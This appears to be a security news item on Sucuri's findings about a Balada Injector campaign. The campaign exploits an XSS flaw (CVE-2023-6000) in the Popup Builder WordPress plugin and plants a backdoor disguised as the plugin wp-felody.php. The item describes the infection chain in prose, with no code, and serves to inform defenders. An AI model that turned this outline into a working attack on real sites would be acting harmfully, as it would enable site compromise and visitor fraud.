Sucuri Unveils Balada Injector Campaign Targeting WordPress

Security specialists at Sucuri have discovered a new campaign by Balada Injector, initiated in mid-December 2023. This campaign has led to the infection of over 6700 WordPress sites using a vulnerable version of the Popup Builder plugin.

Initially identified by Sucuri, Balada Injector was first detected last year. It’s been known for spreading Linux backdoors since 2017, affecting over a million WordPress sites through various vulnerabilities in multiple plugins and themes.

Typically, Balada Injector redirects visitors of compromised sites to fake technical support pages, fraudulent lottery wins, scam-related push notifications, and more.

The latest campaign began on December 13, 2023, following the disclosure of an XSS vulnerability, CVE-2023-6000, in the Popup Builder plugin by WPScan analysts. This plugin is used on 200,000 sites.

Balada Injector authors quickly incorporated an exploit for this bug into their malware. It exploits the sgpbWillOpen event in Popup Builder and executes malicious JavaScript code in the site’s database when a popup is launched.

Additionally, the attackers use a method of further infection by modifying the wp-blog-header.php file to inject the same JavaScript backdoor into the site.

Following this, the attackers check the administrator-associated cookies, enabling them to upload various script sets for injecting the main backdoor, disguised as the wp-felody.php plugin.

The backdoor is capable of executing arbitrary PHP code, uploading and executing files, interacting with attackers, and receiving additional payloads.

As mentioned, over 6700 sites are currently infected, with redirects in this malicious campaign mainly associated with fraudulent push notifications.